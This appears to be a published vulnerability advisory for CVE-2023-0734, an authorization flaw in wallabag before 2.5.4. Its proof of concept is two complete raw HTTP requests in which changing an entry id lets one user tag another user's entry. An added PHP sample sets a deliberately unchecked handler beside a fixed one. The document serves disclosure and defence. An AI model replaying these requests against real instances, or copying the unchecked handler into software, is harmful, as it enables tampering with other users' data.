Headline
CVE-2023-0734: IDOR vulnerability allows adding tags to another user's entry in wallabag
Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.4.
Description
An IDOR vulnerability allows a logged-in user to add tags to any other user's entry, since there is no per-user authorization check on the entry. In addition, the tag input is not length-limited, which causes the entry interface to break.
Proof of Concept
Step 1. User A manages entry id 6
Step 2. User B manages entry id 7
Step 3. Log in as user A and add a tag to this user's own entry
e.g., as demo user A:
POST /new-tag/6 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
Step 4. Change the ID in the path to 7; the tag is now added to user B's entry
POST /new-tag/7 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
Step 5. The input value is not length-limited; entering more than 200 characters breaks the interface
Impact
An attacker can add tags to another user's entries and break the entry interface.
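Added example (not wallabag's code and not part of the original report): a minimal PHP model of the flaw described above, showing the unchecked handler beside a hardened one that verifies entry ownership and caps the tag label length. The Entry class, the function names, user ids 1 and 2, and the 50-character limit are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical minimal model for illustration; these are not wallabag's classes.
final class Entry
{
    /** @var string[] */
    public array $tags = [];

    public function __construct(public int $id, public int $ownerId) {}
}

// Assumed limit, chosen below the 200 characters the report says break the interface.
const MAX_TAG_LABEL_LENGTH = 50;

// Vulnerable shape: the entry is selected by the id from the URL and modified without
// comparing its owner to the logged-in user, and the label length is unbounded.
function addTagUnchecked(array $entries, int $entryId, string $label): void
{
    $entries[$entryId]->tags[] = $label;
}

// Hardened shape: object-level authorization first, then input validation.
function addTag(array $entries, int $currentUserId, int $entryId, string $label): void
{
    $entry = $entries[$entryId] ?? null;
    // Same error for "missing" and "not yours", so entry ids cannot be enumerated.
    if ($entry === null || $entry->ownerId !== $currentUserId) {
        throw new RuntimeException('Entry not found');
    }
    $label = trim($label);
    if ($label === '' || strlen($label) > MAX_TAG_LABEL_LENGTH) { // byte length
        throw new InvalidArgumentException('Invalid tag label');
    }
    $entry->tags[] = $label;
}

// Constructed sample data mirroring the report: user A (id 1) owns entry 6, user B (id 2) owns entry 7.
$entries = [6 => new Entry(6, 1), 7 => new Entry(7, 2)];

addTag($entries, 1, 6, 'demoidor'); // user A tags their own entry
foreach ([[7, 'demoidor'], [6, str_repeat('A', 201)]] as [$id, $label]) {
    try {
        addTag($entries, 1, $id, $label); // user A: another user's entry, then an oversized label
    } catch (RuntimeException | InvalidArgumentException $e) {
        echo "rejected /new-tag/$id: {$e->getMessage()}\n";
    }
}
printf("entry 6 tags: %d, entry 7 tags: %d\n", count($entries[6]->tags), count($entries[7]->tags));
```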
Related news
GHSA-8ccw-f83g-v7g3: Wallabag Improper Authorization vulnerability